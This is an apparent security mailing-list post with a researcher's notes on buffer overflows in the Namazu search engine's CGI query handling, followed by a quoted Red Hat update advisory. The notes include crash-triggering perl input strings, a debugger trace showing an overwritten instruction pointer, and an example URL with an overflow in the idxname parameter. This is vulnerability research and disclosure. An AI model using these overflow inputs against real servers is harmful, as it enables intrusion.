Doh! Looks like I slept on this one too long... heres some of my personal notes on exploiting this issue. Have fun. -KF [root@linuxppc root]# cat misc/namzu-overflow.txt http://www.altavista.com/sites/search/web?q=url%3Anamazu.cgi&kl=XX This is what caught my attention [msg(XXX)] like 12 days old [msg(XXX)] 2001-12-12 NOKUBI Takatsugu <knok@daionet.gr.jp> [msg(XXX)] (nmz_choose_msgfile_suffix): Fixed buffer overflow. [msg(XXX)] http://cvs.namazu.org/~checkout~/namazu/ChangeLog?rev=1.912&content-type=text/plain 2001-12-11 NOKUBI Takatsugu <knok@daionet.gr.jp> * nmz/field.c: Fixed possibility of buffer overflow. 2001-12-04 NOKUBI Takatsugu <knok@daionet.gr.jp> * src/{form.c,rcfile.c,result.c}: Fixed possibility of buffer overflow. * src/cgi.c (validate_idxname): Fixed another cross-site scripting vulnerability. (cgi_get_vars): Fixed possibility of buffer overflow. 2001-07-03 Yoshinori TAKESAKO <takesako@namazu.org> * src/result.c (my_strcasestr): Checked a buffer overflow, the case where a character sequence was over at the 1st byte of EUC-JP. Here is my research on the above issues: There are several buffer overflows in the QUERY_STRING options Unfortunately the check in namazu.h screws us... [root@linuxppc src]# grep CGI_QUERY_MAX *.h namazu.h: CGI_QUERY_MAX = 512, /* Max length of a CGI query */ cgi.c: if (contlen > CGI_QUERY_MAX) { cgi.c: printf(_("Too long QUERY_STRING")); In other words unless you have modified namazu then you are not vuln. Now we can exploit this via the command line as a side note ... although its not suid... [root@linuxppc src]# ./namazu querystring `perl -e 'print "A" x 1024'` Results: References: [ (can't open the index) ] No document matching your query. Aborted (core dumped) The eip is easily overwritten.Here only the first 2 bytes... Starting program: /root/namazu-2.0.5/src/../src/.libs/lt-namazu yamom `perl -e 'print "A" x 1342'` Program received signal SIGILL, Illegal instruction. 0x41412f4c in ?? () So just for theory sake and cuz I want to code something... we will say that we are using a Custom namazu that we modified the following values in namazu.h. CGI_QUERY_MAX = 512, /* Max length of a CGI query */ CGI_INDEX_NAME_MAX = 64, /* Max length of an index name in a CGI query */ Then we could be exploited. cgi-bin/namazu.cgi?query=overflow&whence=0=en&idxname=<bof here> would be a quick example. -KF bugzilla@redhat.com wrote: > --------------------------------------------------------------------- > Red Hat, Inc. Red Hat Security Advisory > > Synopsis: Updated namazu packages are available > Advisory ID: RHSA-2001:179-05 > Issue date: 2001-12-27 > Updated on: 2002-01-09 > Product: Red Hat Linux > Keywords: namazu cross-site scripting buffer overflow > Cross references: > Obsoletes: RHSA-2001:162 > --------------------------------------------------------------------- > > 1. Topic: > > Updated namazu packages are available for Red Hat Linux 7.0J. These > packages fix cross-site scripting vulnerabilities. It also fixes a possible > buffer overflow. > > 2. Relevant releases/architectures: > > Red Hat Linux 7.0J - i386 > > 3. Problem description: > > Namazu is a full-text search engine. Namazu 2.0.9 and earlier may > inadvertently include malicious HTML tags or scripts in a dynamically > generated page, based on unvalidated input from untrustworthy sources. > Also, a buffer overflow vulnerability exists in the buffer size of an > environment variable. > > These packages update Namazu to version 2.0.10 which is not vulnerable to > these issues. > > 4. Solution: > > Before applying this update, make sure all previously released errata > relevant to your system have been applied. > > To update all RPMs for your particular architecture, run: > > rpm -Fvh [filenames] > > where [filenames] is a list of the RPMs you wish to upgrade. Only those > RPMs which are currently installed will be updated. Those RPMs which are > not installed but included in the list will not be updated. Note that you > can also use wildcards (*.rpm) if your current directory *only* contains the > desired RPMs. > > Please note that this update is also available via Red Hat Network. Many > people find this an easier way to apply updates. To use Red Hat Network, > launch the Red Hat Update Agent with the following command: > > up2date > > This will start an interactive process that will result in the appropriate > RPMs being upgraded on your system. > > 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info): > > > > 6. RPMs required: > > Red Hat Linux 7.0J: > > SRPMS: > ftp://updates.redhat.com/7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm > > i386: > ftp://updates.redhat.com/7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm > ftp://updates.redhat.com/7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm > ftp://updates.redhat.com/7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm > > > > 7. Verification: > > MD5 sum Package Name > -------------------------------------------------------------------------- > 521c9faef31dcd865d3e0090cd023d70 7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm > ae5d586caf2098a0b9aefcc7af6522a9 7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm > 904dc3993c140794373471e8a1c64c61 7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm > af30f16968c527ac9e7669c812618cde 7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm > > > These packages are GPG signed by Red Hat, Inc. for security. Our key > is available at: > http://www.redhat.com/about/contact/pgpkey.html > > You can verify each package with the following command: > rpm --checksig <filename> > > If you only wish to verify that each package has not been corrupted or > tampered with, examine only the md5sum with the following command: > rpm --checksig --nogpg <filename> > > 8. References: > > http://www.namazu.org/#news > > > Copyright(c) 2000, 2001, 2002 Red Hat, Inc. > > > >
